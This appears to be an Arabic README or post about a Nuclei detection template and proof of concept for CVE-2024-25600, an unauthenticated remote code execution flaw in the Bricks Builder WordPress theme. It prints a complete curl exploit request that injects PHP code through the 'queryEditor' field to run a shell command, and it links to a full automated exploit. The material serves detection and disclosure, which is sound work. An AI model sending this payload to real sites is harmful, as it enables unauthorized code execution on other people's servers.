
قالب Nuclei ومعلومات حول الـ POC لـ CVE-2024-25600
قالب Nuclei ومعلومات حول إثبات المفهوم (POC) لـ CVE-2024-25600
ثمة ثغرة أمنية في قالب Bricks لووردبريس تسمح بتنفيذ الأوامر عن بُعد (RCE) في جميع الإصدارات حتى الإصدار 1.9.6. وهذا يجعل من الممكن للمهاجمين غير الموثّقين تنفيذ أكواد ضارة على الخادم. هذا القالب 🛠️ مصمم لاكتشاف الثغرة الأمنية CVE-2024-25600 🕳️ الموجودة في إضافة Bricks Builder لووردبريس باستخدام Nuclei. تسمح الثغرة بتنفيذ أوامر عن بُعد دون مصادقة على المواقع المتضررة 💻.
إثبات المفهوم الكامل (تلقائي) متاح على https://github.com/chocapikk/CVE-2024-25600.
إثبات المفهوم الأساسي الذي قدمه الإفصاح هو كما يلي:
curl -k -X POST https://[HOST]/wp-json/bricks/v1/render_element \
-H "Content-Type: application/json" \
-d '{
"postId": "1",
"nonce": "[NONCE]",
"element": {
"name": "container",
"settings": {
"hasLoop": "true",
"query": {
"useQueryEditor": true,
"queryEditor": "ob_start();echo `id`;$output=ob_get_contents();ob_end_clean();throw new Exception($output);",
"objectType": "post"
}
}
}
}'
استبدل [HOST] بالموقع المستهدف و [NONCE] بقيمة nonce المستخرجة من الموقع.
لمزيد من المعلومات حول الثغرة الأمنية CVE-2024-25600، يُرجى مراجعة الإفصاح المفصل على Snicco.io.